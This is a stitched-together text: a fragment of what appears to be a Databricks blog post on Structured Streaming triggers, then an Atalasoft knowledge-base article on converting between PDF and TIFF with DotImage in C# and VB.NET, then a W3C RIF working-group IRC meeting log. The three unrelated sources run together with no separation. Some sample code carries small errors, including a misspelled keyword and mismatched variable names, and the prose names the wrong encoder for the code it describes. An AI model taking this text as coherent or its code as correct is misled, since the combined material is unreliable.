At Databricks, we use the Jobs scheduler to run all of our production jobs. As engineers, we ensure that the business logic within our ETL job is well tested. We upload our code to Databricks as a library, and we set up notebooks to set the configurations for the ETL job such as the input file directory. The rest is up to Databricks to manage clusters, schedule and execute the jobs, and Structured Streaming to figure out which files are new, and process incoming data. The end result is an end-to-end — from data origin to data warehouse, not only within Spark — exactly once data pipeline. Check out our documentation on how to best run Structured Streaming with Jobs.
Summary
In this blog post we introduced the new “execute once” trigger for Structured Streaming. While the execute once trigger resembles running a batch job, we discussed all the benefits it has over the batch job approach, specifically:
- Managing all the bookkeeping of what data to process
- Providing table level atomicity for ETL jobs to a file store
- Ensuring stateful operations across runs of the job, which allow for easy de-duplication
In addition to all these benefits over batch processing, you also get the cost savings of not having an idle 24/7 cluster up and running for an irregular streaming job. The best of both worlds for batch and streaming processing are now under your fingertips.
Try Structured Streaming today in Databricks by signing up for a 14-day free trial .
Other parts of this blog series explain other benefits as well:
-
- Running Streaming Jobs Once a Day For 10x Cost Savings
| https://databricks.com/blog/2017/05/22/running-streaming-jobs-day-10x-cost-savings.html | CC-MAIN-2018-30 | refinedweb | 940 | 60.85 |
1-781-743-2119 ext 2 Chat
Note: The PdfDecoder class is part of our PdfReader (Formerly called PdfRasterizer) module, which is an add-on to DotImage. To use this class, you must add Atalasoft.dotImage.PdfReader.dll as a reference to your project, and you will need a license file for this module. You can request an evaluation license file for this module using the DotImage Activation Wizard.
You will also want to add a PdfDecoder to your RegisteredDecoders collection in a static constructor for your class:
[C#]
staic MyClass()
{
RegisteredDecoders.Decoders.Add(new PdfDecoder() { Resolution = 200 });
}
[VB.NET]
Shared Sub New
RegisteredDecoders.Decoders.Add(New PdfDecoder() With {.Resolution = 200})
End Sub
Also, we have a complete, working PDF to TIFF demo and a complete, working TIFF to PDF Demo available which implement these techniques.
A common task that comes accross in the document management world is converting from one file format to another. The two most commonly used formats for digital document images are PDF and TIFF. This task may confuse DotImage developer's because the PDF and TIFF codecs function slightly different from each other. Here I will explain the different approaches to this problem. First, I'll start by explaining the simple case, PDF to TIFF.
There are three possible to save a TIFF file in DotImage; The most memory efficient is demonstrated in the PDF to TIFF demo in our demo gallery. It uses a class called FileSystemImageSource which is passed directly to the PdfEncoder.Save method (along with a stream to save to)
[c#]
TiffEncoder enc = new TiffEncoder();
using (FileStream fs = new FileStream("pathToSaveTo", FileMode.OpenOrCreate))
using (FileSystemImageSource fsis = new FileSystemImageSource("PathToSourceTiff", true))
{
enc.Save(fs, fsis, null);
}
Dim enc As New TiffEncoder()
Using fs As New FileStream("pathToSaveTo", FileMode.OpenOrCreate) Using fsis As New FileSystemImageSource("PathToSourceTiff", True) enc.Save(fs, fsis, Nothing) End UsingEnd Using
The other two approaches are still possible, but strongly discouraged in favor of using our ImageSource as outlined above. The reference here is kept for archival purposes.
The first is to have all of the images (pages of the TIFF file) loaded into memory at once, and pass them all to the TiffEncoder to save the file. As you can tell, this is not very memory efficient for large documents. The second way to save a TIFF file is to append the pages, one by one to an existing TIFF file. This way, we only need to keep a single image in memory at any given time.
As with all mutlipage formats, DotImage lets us read a single page from a file. So we can load each page from the PDF file as needed. As you can see from the following example, the first way is much easier to implement, but the second way will conserve a lot of memory.
// First way
enc.Save(outStream,myImageCollection,null);
// Second way
TiffEncoder noAppend = new TiffEncoder(TiffCompression.Default, true);
PdfDecoder pdf = new PdfDecoder();
for(int i=0; i< numPages; i++)
AtalaImage img = pdfDecoder.Read(inStream, i, null);
noAppend.Save(outStream, img, null);
img.Dispose(); outStream.Seek(0, SeekOrigin.Begin);
' First way
Private enc As TiffEncoder = New TiffEncoder()
enc.Save(outStream,myImageCollection,Nothing)
' Second way
Dim noAppend As TiffEncoder = New TiffEncoder(TiffCompression.Default, True)
Dim pdf As PdfDecoder = New PdfDecoder()
Dim i As Integer=0
Do While i< numPages
Dim img As AtalaImage = pdfDecoder.Read(inStream,i,Nothing)
noAppend.Save(outStream, img, Nothing)
img.Dispose() outStream.Seek(0, SeekOrigin.Begin)
i += 1
Loop
That’s it! We have just converted a PDF file to a TIFF file. Now to save the TIFF as PDF. The PdfEncoder in DotImage does not allow us to save a single page to an existing PDF file, so we must have all the images ready when we save the file. But the good part is that these images don’t necessarily need to be held in memory. The PdfEncoder has the standard overload to save an AtalaImage or ImageCollection, but it also introduces a new class called PdfImageCollection, which is made up of PdfImage’s. This class gives us the flexibility to point to a file instead of an image in memory. To do this, simply create a PdfImageCollection that contains a PdfImage that points to the TIFF file that we want to convert.
PdfImageCollection col = new PdfImageCollection();
Col.Add(new PdfImage(“TheDoc.tif”, -1, PdfCompressionType.Auto));
PdfEncoder enc = new PdfEncoder();
enc.Save(outStream,col,null);
Private col As PdfImageCollection = New PdfImageCollection()
Col.Add(New PdfImage(“TheDoc.tif”, -1, PdfCompressionType.Auto))
Dim enc As PdfEncoder = New PdfEncoder()
enc.Save(outStream,col,Nothing)
Giving -1 as the frame index will force the entire TIFF image to be loaded. Converting to PDF isn’t really any harder than converting the other way, it just requires a little more knowledge of the PDF namespace. Using these techniques, the ability to convert from TIFF to PDF, and vice versa, can be easily integrated into any document imaging application using DotImage.
Namespaces used in these examples:
Atalasoft.Imaging
Atalasoft.Imaging.Codec
Atalasoft.Imaging.Codec.Pdf
PDF to TIFF sample app | http://www.atalasoft.com/KB/Article.aspx?id=10125&cNode=6U4E4R | CC-MAIN-2018-39 | refinedweb | 848 | 57.98 |
Well which compiler / IDE are you using?
Well which compiler / IDE are you using?
1, indentation really helps to see what's going on.
#include <stdio.h>
#include <stdlib.h>
int main()
{
int Option, ResCount, Resistors, ResValue, ResTotal;
ResCount = 0;
Yeah, 500 lines of poorly formatted code containing goto's is not a good start.
You have a lot of printf's in there, perhaps you could post those as well.
Bear in mind that either we can't run...
You need to return the new length of the array, after you've removed the duplicates.
> Enter the number of digits : 4
Presumably, you used scanf with %d to read this.
> Enter the number in binaries : 1001
What did you use to read this?
One you have a sequence of 0 and 1, then...
> Always a good idea to give a hand to the compiler,
Or a bad idea.
If you write overly micro-managed "efficient" code, you typically subvert the ability of the optimiser to see through your...
> direction += rotation;
> double ax = acceleration * cos(direction);
> double ay = acceleration * sin(direction);
The first question to ask would be what units your angles are measured...
> for example L = [3, 2, 7, 5, 8]
> if I wanna find successor for 3 it has to be bigger than 3 but smaller than other numbers which is 5.
The question is only meaningful if the list is sorted.
...
> sum_age = sum + list[i].age;
Where is this declared in your code?
At best, it's some messy global variable.
At worst, it's undeclared and your code doesn't even compile.
void...
> int sum_age;
What is the initial value of sum_age?
> sum_age = sum + list[i].age;
What is sum here?
Where did you declare it?
> if(list[i].gender == male)
Use strcmp() to compare strings.
#define FALSE 0u
#define TRUE (~FALSE)
TRUE becomes all bits set in whatever width of data type you end up assigning it to.
Regarding delete
void Delete(personaData list[50], int x)
{
int pnum;
printf("Enter a personal number:");
scanf("%d", pnum);
char emptyStr[20] = {"\0"};
int...
A for loop with a[i] = -a[i]; perhaps?
> printf("%d\n", &length); // prints 6422272
Because you don't use & when printing a value.
> for(i = 0; i <= length; i++)
Arrays run from 0 to length-1
So we usually say
for(i = 0; i <...
Which compiler / IDE are you using?
If you're compiling from the command line, all you need is
g++ main.cpp operator.cpp
So, do you have any code to start with?
Just dumping your assignment on us with zero effort isn't good.
> On the Y axis the temperature should appear and on the X axis the 100 steps.
So you should only be outputting pairs of numbers to begin with.
Using strtok is messy, because you also need to...
> There is no operator present.
But in the context of an expression requiring a boolean expression,
while(numbers[ball])
is the same as
while(numbers[ball] != 0)
Since you then go onto do...
Do you have some context for the question?
> What can be the usage of this?
Typedef'ing a function pointer is very common.
Primarily because they're quite complicated to get right, and they...
cdecl: C gibberish <-> English
It's a function pointer.
Moved to right forum.
Copy and paste your code between
A fuzzy picture of barely legible text just doesn't cut it.
Since you mentioned visual studio, I'll assume your OS is windows.
If you're writing a GUI program, start here
Keyboard Input (Get Started with Win32 and C++) - Win32 apps | Microsoft Docs
Using...
OK, so what vague ideas do you have, so we can help you make them less vague. | https://cboard.cprogramming.com/search.php?s=4d2c1bf22234007d62830f1c5a1b1237&searchid=6400330 | CC-MAIN-2021-10 | refinedweb | 622 | 76.72 |
Reading files from the operating system can be done with T-SQL as I showed in the tip Using OPENROWSET to read large files into SQL Server. What if you want to write to an operating system file? For example, writing to a text file. There's no T-SQL that supports writing to a file.
Solution
The solution is to create a stored procedure that is implemented in the SQLCLR, which allows writing code in .Net languages and running them within SQL Server. Stored procedures can be written in C#, VB.Net or C++ and the compiler produces an assembly, which is the code compiled into .Net Intermediate Language (IL). The assembly is then loaded into SQL Server and a stored procedure is defined to call one of the static methods in the assembly. When the stored procedure is invoked by a T-SQL EXECUTE statement the .Net assembly is loaded, Just-in-Time (JIT) compiled into machine code and the machine code is loaded into SQL Server's memory. SQLCLR code is similar to extended stored procedures and it is intended to replace extended stored procedures when that feature is phased out of SQL Server in a future release.
The easiest way to create SQLCLR objects is to use the Database project template in Visual Studio 2005 Professional Edition or Team Edition. Visual Studio 2008 with Service Pack 1 also supports database projects for SQL Server 2008. Before I walk through that process you're going to need a database. The example files use a connection to the database ns_lib, which you can create with this T-SQL:
Once you have a database, you'll need to pick a programming language. This tip is written in C# but you can also use VB.Net or C++. Then in Visual Studio use the File/New/Project menu command and specify the project name and folder. Here I've named the project ns_txt:
If you have existing database connections defined in Visual Studio, the "Add Database Reference" dialog box will open and you'll be given the chance to pick one of the Available References as depicted here:
You can pick a database reference or press the "Add New Reference..." button. If you don't have existing connections Visual Studio goes right to the "New Database Reference" screen and allows you to create a connection to the database where you want the SQLCLR assembly to be loaded. The following picture shows adding a connection to the ns_lib database on the local machine's default instance:
Once a connection is selected Visual Studio will ask to enable debugging with this dialog box:
The facility to debug the CLR code while it's being called from within SQL Server is a fantastic aid to productivity. However, debugging stops all managed threads, which is the SQLCLR code, from running while debugging. Therefore, I only debug CLR code running on my local development machine. Never debug SQLCLR code on a production server. You can learn more about debugging in this tip Debugging SQL Server CLR functions, triggers and stored procedures. Pick Yes to enable debugging, or No if you don't want it.
Visual Studio creates the project files and you can start work. The next step is to add the stored procedure to the project. Do this by selecting the ns_txt project in the Solution Explorer window and using the menu command Project/Add Stored Procedure. The Add New Item dialog box pops up and you can name the file for your stored procedure code: Here's the dialog with the name that I've chosen, ns_txt_file_write.
Visual Studio creates the file with a partial class named StoredProcedures. You can change that name, if you like. It also creates a "public static void" method for your procedure with the name you gave it and no parameters. Above the procedure declaration is the line "[Microsoft.SqlServer.Server.SqlProcedure]". This line is an attribute that tells Visual Studio how to deploy the procedure into SQL Server.
Now that the project and code file are created, it's time to write the code that implements the stored procedure. ns_txt_file_write has two parameters, file_name and file_contents. Both are strings declared with the SqlString type. The Microsoft.Data.SqlTypes namespace, which is referenced in the third using statement, provides types that allow SQL Server to convey the data precisely and include properties such as IsNull, to communicate that a value is null as well as conversion functions. While it's possible to use CLR types, such as string, for the parameters, I prefer to stick to the SqlTypes to avoid conversion overhead. However, the SqlTypes don't match up with that the CLR expects for strings or integers so in the C# it's necessary to refer to the Value property of the parameter in order to use the variable.
Here's the function all done:
That's it? All this activity for just one line? It's kind of disappointing but it illustrates the power of the SQLCLR. The CLR has the built-in method AppendAllText that takes care of the job and all that ns_txt_file_write has to do is expose it to SQL Server.
There's one more step required before testing the procedure. Because ns_txt_file_write reaches outside of SQL Server into the file system, the permission level given to this code must be raised. By default the permission level of Visual Studio Database projects is Safe, which doesn't allow access outside of SQL Server. The permission level External lets the code access the file system and other external resources, such as Active Directory or web services. There is a third permission level, Unsafe, which allows the use of unmanaged code and calls to Windows API functions. While it's called Unsafe, it's no worse then the permissions given to external stored procedures.
The permission level is set on the Database tab of the projects properties. The following screen shot shows the Permission Level highlighted in red:
Now that everything is ready the project can be compiled and loaded into SQL Server using the menu command Build/Deploy Solution.... That almost works. Instead of deploying to SQL Server I got this message:
CREATE ASSEMBLY for assembly 'ns_txt' failed because assembly 'ns_txt'. If you have restored or attached this database, make sure the database owner is mapped to the correct login on this server. If not, use sp_changedbowner to fix the problem.
As the message explains, SQLCLR code with the EXTERNAL_ACCESS permission set must either be signed or the database must be given the TRUSTWORTHY attribute. Code signing is a subject for another tip so here let's use the easier alternative of making the database TRUSTWORTHY with this ALTER DATABASE statement:
Another problem that you may run into is database ownership. As the message indicates the owner of the database must have EXTERNAL ACCESS ASSEMBLY permission for assemblies that require external access to work. I prefer to have databases owned by sa so if your database isn't, it can be changed with this exec statement:
My next try with the menu command Build/Deploy Solution was successful. Behind the scenes Visual Studio is telling SQL Server to create an assembly from the compiled code and to create the stored procedures with these SQL Statements:
Using a Visual Studio Database project makes creating SQLCLR procedures easy but you could use a text editor to create the cs file and handle the compiling, assembly loading, and stored procedure creation yourself. To read more about how to do that see the tip CLR function to delete older backup and log files in SQL Server, which shows the individual steps.
Once these security issues are managed and the deployment is successful, it's time to test out the stored procedure. From an SSMS query window it is now possible to execute the procedure. You may have to modify the @file_name parameter of the following query to point to a directory that exists on your server. Once it's set go ahead and execute it:
There are additional details, such as error handling, that can be handled more robustly but this simple example illustrates how to create a stored procedure that takes advantage of the power of the CLR from within SQL Server. The procedure is also limited to working with @file_contents of only 4000 characters because of the data type given to the stored procedure by Visual Studio.
The SQLCLR was introduced in SQL Server 2005 and has been enhanced for SQL Server 2008. In earlier versions similar functionality can be achieved by writing extended stored procedures or in SQL Server 2000 using the sp_OA_* extended stored procedures to invoke COM objects running outside of SQL Server. Those solutions are more dangerous to SQL Server and in the case of Ole Automation much slower. The SQLCLR is a significant improvement in the capability of SQL Server and it can be used to create database objects other than stored procedures such as functions, triggers, user-defined aggregates, user-defined types and triggers.
Next Steps | http://www.mssqltips.com/sqlservertip/1662/writing-to-an-operating-system-file-using-the-sql-server-sqlclr/ | CC-MAIN-2015-14 | refinedweb | 1,516 | 59.84 |
IRC log of rif on 2009-05-26
Timestamps are in UTC.
14:47:38 [RRSAgent]
RRSAgent has joined #rif
14:47:38 [RRSAgent]
logging to
14:47:44 [ChrisW]
zakim, this will be rif
14:47:44 [Zakim]
ok, ChrisW; I see SW_RIF()11:00AM scheduled to start in 13 minutes
14:47:47 [ChrisW]
zakim, clear agenda
14:47:47 [Zakim]
agenda cleared
14:47:56 [ChrisW]
Chair: Chris Welty
14:48:01 [ChrisW]
rrsagent, make minutes
14:48:01 [RRSAgent]
I have made the request to generate
ChrisW
14:48:18 [ChrisW]
Meeting: RIF Telecon 26-May-2009
14:48:32 [ChrisW]
Agenda:
14:49:05 [ChrisW]
ChrisW has changed the topic to: RIF Last Call Day II Telecon, Agenda
14:49:34 [ChrisW]
Regrets: PaulVincent
14:49:57 [ChrisW]
rrsagent, make logs public
14:50:50 [ChrisW]
agenda+ Admin
14:50:59 [ChrisW]
agenda+ Liason
14:51:10 [ChrisW]
agenda+ Action Review
14:51:17 [MoZ]
s/Liason/Liaison/
14:51:28 [ChrisW]
agenda+ PRD
14:51:32 [ChrisW]
agenda+ SWC
14:51:35 [ChrisW]
agenda+ FLD
14:51:44 [ChrisW]
agenda+ XML Schema task force
14:51:52 [ChrisW]
agenda+ WG Future and schedule
14:51:58 [ChrisW]
agenda+ rdf:text
14:52:01 [ChrisW]
agenda+ AOB
14:52:09 [ChrisW]
zakim, take up next item
14:52:09 [Zakim]
agendum 1. "Admin" taken up [from ChrisW]
14:58:54 [Zakim]
SW_RIF()11:00AM has now started
14:58:58 [Zakim]
+Sandro
14:59:18 [mdean]
mdean has joined #rif
14:59:37 [AdrianP]
AdrianP has joined #rif
14:59:38 [josb]
josb has joined #rif
14:59:48 [csma]
csma has joined #rif
15:00:27 [Zakim]
+Mike_Dean
15:00:52 [Zakim]
+Hassan_Ait-Kaci
15:01:34 [StellaMitchell]
StellaMitchell has joined #rif
15:01:45 [Zakim]
+[IBM]
15:01:54 [ChrisW]
Scribe: Mike Dean
15:02:00 [ChrisW]
scribenick: mdean
15:02:09 [ChrisW]
zakim, ibm is temporarily me
15:02:09 [Zakim]
+ChrisW; got it
15:02:22 [Zakim]
+??P15
15:02:23 [Zakim]
+Stella_Mitchell
15:02:25 [ChrisW]
zakim, Mike_Dean is mdean
15:02:25 [Zakim]
+mdean; got it
15:02:31 [hak]
hak has joined #rif
15:02:48 [ChrisW]
zakim, ??P15 is cke
15:02:48 [Zakim]
+cke; got it
15:02:48 [Harold]
Harold has joined #rif
15:02:53 [ChrisW]
zakim, who is on the phone?
15:02:53 [Zakim]
On the phone I see Sandro, mdean, Hassan_Ait-Kaci, ChrisW, cke, Stella_Mitchell
15:03:19 [cke]
cke has joined #RIF
15:03:32 [ChrisW]
zakim, Hassan_Ait-Kaci is hak
15:03:32 [Zakim]
+hak; got it
15:03:43 [ChrisW]
zakim, mute hak
15:03:43 [Zakim]
hak should now be muted
15:04:29 [Zakim]
+[NRCC]
15:04:43 [DaveReynolds]
DaveReynolds has joined #rif
15:04:47 [Harold]
zakim, [NRCC] is me
15:04:49 [Zakim]
+Harold; got it
15:05:02 [Zakim]
+??P42
15:05:19 [Zakim]
+[IPcaller]
15:05:26 [Zakim]
+??P44
15:05:29 [AdrianP]
Zakim, [IPcaller] is me
15:05:29 [Zakim]
+AdrianP; got it
15:06:02 [ChrisW]
zakim, who is on the phone?
15:06:02 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, Stella_Mitchell, Harold, DaveReynolds, AdrianP, josb
15:06:27 [cke]
Christian is in IRC, but not on the phone
15:06:31 [DaveReynolds]
Apologies but I need to leave the call early (by about 40 min)
15:06:46 [ChrisW]
15:06:52 [ChrisW]
PROPOSED: accept last weeks minutes
15:07:12 [ChrisW]
RESOLVED: accept last weeks minutes
15:07:15 [mdean]
ChrisW: contain 3 last call resolutions
15:07:22 [Gary_Hallmark]
Gary_Hallmark has joined #rif
15:07:23 [ChrisW]
zakim, next item
15:07:23 [Zakim]
agendum 2. "Liason" taken up [from ChrisW]
15:07:27 [mdean]
ChrisW: no agenda amendments
15:08:05 [Zakim]
+Gary
15:08:08 [mdean]
Sandro: SPARQL working group response and discussion about rdf:text
15:08:23 [mdean]
... need about 3 words change - mention SPARQL explicitly - all editorial
15:08:24 [Zakim]
+csma
15:08:33 [mdean]
... lots of people misunderstood spec
15:08:36 [csma]
zakim, csma is me
15:08:36 [Zakim]
+csma; got it
15:08:38 [mdean]
... close to consensus
15:09:11 [mdean]
... Axel proposed change from rdf:text to rdf:plainLiteral
15:09:21 [csma]
zakim, mute me
15:09:21 [Zakim]
csma.a should now be muted
15:09:27 [josb]
I would be fine with the name change
15:09:31 [mdean]
... don't expect any (other) substantive changes
15:09:51 [mdean]
ChrisW: shouldn't require another last call by itself
15:10:26 [mdean]
Sandro: OWL 2 close to CR - one more document and internal approval - should be CR in a couple weeks
15:10:35 [ChrisW]
zakim, next item
15:10:35 [Zakim]
agendum 3. "Action Review" taken up [from ChrisW]
15:10:53 [MichaelKifer]
MichaelKifer has joined #rif
15:11:26 [ChrisW]
close action-822
15:11:27 [trackbot]
ACTION-822 Change subscript "l" in 6.1 to something else (not so confused with "1") and have Jos proof-read the change. closed
15:11:41 [Zakim]
+MichaelKifer
15:11:55 [csma]
zakim, who is on the phone?
15:11:55 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, Stella_Mitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted), MichaelKifer
15:11:57 [mdean]
close action-821
15:11:57 [trackbot]
ACTION-821 Review pending DTB actions (815-820) closed
15:12:46 [csma]
782 and 784 are continued
15:12:56 [StellaMitchell]
zakim, Stella_Mitchell is really me
15:12:56 [Zakim]
+StellaMitchell; got it
15:13:23 [mdean]
780 and 777 are continued
15:13:28 [csma]
zakim, unmute me
15:13:28 [Zakim]
csma.a should no longer be muted
15:13:34 [Zakim]
-MichaelKifer
15:14:04 [mdean]
csma: hope for PRD last call today
15:14:38 [mdean]
ChrisW: Axel hasn't yet reviewed appendix
15:14:48 [mdean]
772 and 770 are continued
15:15:42 [mdean]
close action-770
15:15:42 [trackbot]
ACTION-770 Review Core closed
15:17:07 [mdean]
765 is continued
15:17:10 [StellaMitchell]
708 continued (in progress)
15:17:20 [hak]
continued until further notice ... (will get really serious on it when all the RIF XML vocabularies are stable - last call)
15:17:42 [mdean]
ChrisW: concludes open actions
15:18:00 [AxelPolleres]
AxelPolleres has joined #rif
15:18:12 [mdean]
... pending review: test cases, DTB treatment of casting
15:18:15 [csma]
zakim, mute me
15:18:15 [Zakim]
csma.a should now be muted
15:18:31 [mdean]
close action-740
15:18:31 [trackbot]
ACTION-740 Accomodate casting functions in a well defined manner closed
15:19:00 [Harold]
zakim, who is on the phone?
15:19:00 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted)
15:19:01 [mdean]
close action-815
15:19:01 [trackbot]
ACTION-815 Mark rdf:text at risk in DTB closed
15:19:14 [Harold]
zakim, who is on the phone?
15:19:14 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted)
15:19:38 [mdean]
close action-816
15:19:38 [trackbot]
ACTION-816 Rename "primitive" datatypes to datatypes closed
15:19:42 [mdean]
close action-815
15:19:42 [trackbot]
ACTION-815 Mark rdf:text at risk in DTB closed
15:19:47 [mdean]
close action-818
15:19:47 [trackbot]
ACTION-818 Make base directive iris absolute closed
15:19:55 [ChrisW]
zakim, next item
15:19:55 [Zakim]
agendum 4. "PRD" taken up [from ChrisW]
15:20:04 [mdean]
ChrisW: concludes action review
15:20:17 [csma]
zakim, unmute me
15:20:17 [Zakim]
csma.a should no longer be muted
15:20:42 [Zakim]
+AxelPolleres
15:20:48 [mdean]
... reviewers for PRD: Harold and Shanghai (sp)
15:21:12 [cke]
s/Shanghai/Changhai
15:21:15 [sandro]
sandro has joined #rif
15:21:35 [mdean]
csma: English proofreading
15:22:23 [mdean]
csma: Adrian addressed model theoretic concerns
15:22:27 [sandro]
Harold, do you know how to do wiki diffs? They are pretty readable these days...
15:22:29 [sandro]
(usually)
15:22:48 [mdean]
... moved semantics of conditions to appendix
15:24:11 [mdean]
... target audience more familiar with pattern-matching semantics
15:24:49 [Zakim]
+MichaelKifer
15:25:21 [mdean]
Harold: (forward) references to appendix are OK
15:25:34 [cke]
Christian, your change addresses my main concern. The others are more minor
15:26:20 [Harold]
PRD Editors, the Abstract is still a bit short.
15:26:25 [mdean]
Gary: would like pattern-matching and model theory to be equivalent, but requires talking about safety
15:26:55 [Harold]
s/safety/safeness/
15:27:21 [mdean]
csma: only reference to safety in conformance and definition in core, which may be obscure to non-logician
15:27:54 [mdean]
s/safety/safeness
15:28:21 [mdean]
csma: perhaps remove pattern matching from title of section
15:28:51 [mdean]
Gary: don't require constraint solving
15:29:34 [mdean]
csma: current definitions are equivalent
15:29:55 [mdean]
... this is an editorial change
15:30:01 [mdean]
Gary: wasn't obvious from my reading
15:30:19 [mdean]
csma: pattern matching title is misleading
15:31:00 [mdean]
csma: operational definition of safeness - working on it for a while
15:31:13 [mdean]
... hesitant to make Last Call dependent on such an editorial change
15:32:21 [sandro]
csma: This is just an editorial change; it does not affect conformance. we're clear that constraint satisfaction is not needed in consumers.
15:32:48 [Zakim]
+LeoraMorgenstern
15:33:32 [cke]
Does PRD inherit the safeness from Core??
15:33:33 [sandro]
csma: This will make understanding PRD easier for users, but does not change definition. We should work on this later, after Last Call.
15:33:56 [sandro]
chris: the change is: the move discussion of safeness to be earlier in document?
15:34:15 [sandro]
csma: Not exactly: to add an operational definition of safeness. Maybe move it -- I don't know.
15:34:43 [AdrianP]
we should try to build the PRD safety defintion upon the Core safety definition
15:35:10 [sandro]
chris: everyone agree that an operational definition of safeness is not required for last call?
15:35:19 [sandro]
harold: agreed
15:35:26 [josb]
agreed
15:35:40 [cke]
There is so far no mention of safeness in PRD.
15:35:59 [sandro]
mdean, don't let me as stop you from scribing -- I just want additional clarity on bits which I think are crucial to minute.
15:36:39 [csma]
Changhai: there is, in the conformance section.
15:38:39 [ChrisW]
zakim, who is talking?
15:38:48 [Gary]
2 issues: 1. is the model theory and pattern matching really the same? or does pattern matching imply safeness? 2. assuming equivalent, we should make it more obvious that safeness is required and can be used to simplify implementation
15:38:50 [Zakim]
ChrisW, listening for 10 seconds I heard sound from the following: csma.a (92%)
15:38:58 [ChrisW]
zakim, who is talking?
15:39:10 [Zakim]
ChrisW, listening for 10 seconds I heard sound from the following: csma.a (75%)
15:40:23 [csma]
actions: check that the two spec of the semantics of the condition are equivalent
15:41:55 [ChrisW]
action: chris to review PRD operational and model=theoretic conditions are =
15:41:55 [trackbot]
Created ACTION-824 - Review PRD operational and model=theoretic conditions are = [on Christopher Welty - due 2009-06-02].
15:41:57 [csma]
... clarify that safeness is required to guarantee that constraint solving is not required for RIF-PRD
15:43:34 [ChrisW]
action: csma to clarify in PRD that safeness is required to guarantee that constraint solving is not needed
15:43:34 [trackbot]
Created ACTION-825 - Clarify in PRD that safeness is required to guarantee that constraint solving is not needed [on Christian de Sainte Marie - due 2009-06-02].
15:43:40 [mdean]
csma: should satisfy Gary's comment
15:43:49 [csma]
... add, if possible, an operational definition of safety
15:44:10 [ChrisW]
action: csma add, if possible, an operational definition of safety
15:44:10 [trackbot]
Created ACTION-826 - Add, if possible, an operational definition of safety [on Christian de Sainte Marie - due 2009-06-02].
15:44:21 [mdean]
csma: definition would probably go in appendix
15:44:58 [mdean]
ChrisW: Last Call dependent on completion of actions 824 and 825
15:45:22 [mdean]
csma: also need to remove appendix 13 - currently incomplete
15:45:23 [ChrisW]
action: csma to fix or remove appendix 13
15:45:23 [trackbot]
Created ACTION-827 - Fix or remove appendix 13 [on Christian de Sainte Marie - due 2009-06-02].
15:45:48 [ChrisW]
action: gary review csma changes to PRD
15:45:48 [trackbot]
Created ACTION-828 - Review csma changes to PRD [on Gary Hallmark - due 2009-06-02].
15:46:27 [mdean]
csma: Last Call dependent on completion of 824, 825, 827, 828
15:47:23 [ChrisW]
PROPOSED: Publish PRD as Last Call, contingent on completion of actions 824, 825, 827, and 828
15:47:34 [Harold]
+1
15:47:36 [AdrianP]
+1
15:47:37 [cke]
+1
15:47:39 [StellaMitchell]
+1
15:47:40 [Gary]
+1
15:47:40 [mdean]
+1
15:47:41 [DaveReynolds]
+1
15:47:45 [hak]
+1
15:47:47 [ChrisW]
Axel: +1 (on phone)
15:47:51 [apollere2]
apollere2 has joined #rif
15:47:53 [MichaelKifer]
+1
15:47:54 [josb]
0 [since I could not review it]
15:47:56 [ChrisW]
+1
15:48:09 [sandro]
+1
15:48:13 [apollere2]
+1
15:48:14 [ChrisW]
zakim, who is on the phone?
15:48:14 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a, AxelPolleres, MichaelKifer, LeoraMorgenstern
15:49:07 [ChrisW]
Leora: +1 (on phone)
15:49:18 [ChrisW]
RESOLVED: Publish PRD as Last Call, contingent on completion of actions 824, 825, 827, and 828
15:49:24 [ChrisW]
zakim, next item
15:49:24 [Zakim]
agendum 5. "SWC" taken up [from ChrisW]
15:49:36 [csma]
zakim, mute me
15:49:36 [Zakim]
csma.a should now be muted
15:49:46 [mdean]
ChrisW: 2 reviews, from Axel and Gary
15:50:44 [mdean]
ChrisW: PRD checklist includes - check syntactic list ... from core
15:50:44 [ChrisW]
ack csma.a
15:50:47 [csma]
zakim, unmute me
15:50:47 [Zakim]
csma.a was not muted, csma
15:51:07 [mdean]
s/.../restriction/
15:51:45 [mdean]
Adrian: done for presentation syntax and XML
15:51:57 [mdean]
ChrisW: back to SWC
15:52:14 [mdean]
Axel: import for OWL, but OWL doesn't have import for RIF (e.g. DL Safe RIF Rules)
15:52:28 [mdean]
... a couple editorial items
15:53:01 [mdean]
... XML Schema namespace prefix terminology
15:53:18 [mdean]
ChrisW: not fixed?
15:53:27 [mdean]
Axel: no email from Jos
15:53:38 [mdean]
Jos: not yet incorporated
15:54:17 [mdean]
ChrisW: make concrete list and action, so vote can be contingent
15:54:18 [csma]
zakim, mute me
15:54:18 [Zakim]
csma.a should now be muted
15:55:34 [mdean]
Axel: multi-structures look different from BLD
15:56:04 ).
15:57:20 [Zakim]
-DaveReynolds
15:59:02 [mdean]
ChrisW: changed a couple months ago
15:59:38 [mdean]
MichaelKifer: lack of uniformity entailing formulas that are not documents
16:00:19 [mdean]
... can now adorn any structure with any formula
16:00:45 [mdean]
s/can now/could/
16:00:56 [mdean]
... now more restrictive
16:01:17 [mdean]
... role of each item in semantic structure is now clear
16:01:28 [csma]
(Re lists in PRD: I just checked, and the abstract syntax includes the restriction)
16:01:52 [mdean]
... also allows more uniformity in FLD
16:02:51 [mdean]
ChrisW: SWC still has old multi-structure definition
16:03:12 [mdean]
MichaelKifer: ... not needed there, kind of artificial
16:04:12 [mdean]
Axel: recursive imports needs to be clarified
16:05:04 [mdean]
Jos: addressed in section 5.2
16:05:25 [mdean]
s/addressed/recursive imports addressed/
16:06:08 [mdean]
ChrisW: imports closure
16:06:53 [ChrisW]
action: josb to update SWC to new BLD definition of multi-structures
16:06:53 [trackbot]
Created ACTION-829 - Update SWC to new BLD definition of multi-structures [on Jos de Bruijn - due 2009-06-02].
16:10:01 [ChrisW]
action: to review jos' edits to SWC
16:10:01 [trackbot]
Sorry, couldn't find user - to
16:10:06 [ChrisW]
action: axel to review jos' edits to SWC
16:10:07 [trackbot]
Created ACTION-830 - Review jos' edits to SWC [on Axel Polleres - due 2009-06-02].
16:10:32 [mdean]
Gary: all known issues have been taken care of
16:11:45 [mdean]
Jos: suggest publishing SWC without proofs
16:12:57 [mdean]
